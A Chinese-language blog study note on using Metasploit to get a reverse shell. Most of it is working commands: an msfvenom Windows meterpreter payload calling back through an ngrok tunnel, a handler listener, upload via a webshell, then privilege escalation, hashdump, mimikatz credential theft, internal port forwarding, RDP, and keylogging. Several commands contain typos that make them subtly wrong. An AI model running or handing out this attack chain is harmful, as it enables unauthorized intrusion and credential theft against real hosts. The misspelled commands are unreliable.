学习笔记 | Metasploit之弹个Shell

【摘要】一、简介:Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。二、bind_tcp弹个shell:我还没写~三、revers_tcp弹个shell:sun...

一、简介:

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。

二、bind_tcp弹个shell:

我还没写~

三、revers_tcp弹个shell:

sunny clientid 隧道id 
即可启动服务

生成反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=19286 -f exe > /tmp/reverse.exe

Msfconsole		#启动msf
use exploit/multi/handler	#监听
set payload windows/meterpreter/reverse_tcp	#设置payload reverse_tcp
set LHOST 0.0.0.0		#设置本地监听所有IP
set LPORT 端口		#设置本地监听端口4444

run即可

然后上传reverse.exe至webshell
运行revers.exe
此时等待一会儿发现本机已经建立会话

getuid  //发现权限较低,为user

getsystem    //提权

migrate pid    //进程注入提权

hashdump  //下载hash

load mimikaz //读取明文pawd

meterpreter下: shell   //进入对方shell

portfwd add -l 本机端口 -r 远程主机IP -p 远程主机端口   //内网转发
rdesktop a 32 127.0.0.1:本机端口   //远程链接

moudle    //模块
payload   //攻击载荷
msvenom   //msfpayload,msfencode的结合体
msvenom -p 攻击载荷 -LHOST 本地IP -LPORT 本地端口 -f 文件格式 -o 输出目录
use exploit/multi/handler  监听模块
set payload 相同攻击载荷
set lhost 0.0.0.0
set lport 本地端口
//建立会话后
jobs 停止获取
sessions -l   //列出session
session -i id   //进入meterpreter

之后的对于具体操作 输入-help 或 ? 即可获取帮助
比如键盘记录啊、屏幕监控run vnc等等的~

就到这里了,也可以使用background后,使用msf的exploit提权

 小东
 简介:专业团队网站开发、安全运维,合作意向请联系!

扫码关注微信公众号:ITDYBOY,学前端,学安全,从0到1,从1到精通!

扫码关注微信公众号:ITDYBOY

发表评论

游客
送你一朵小花花~

帅人已评(1)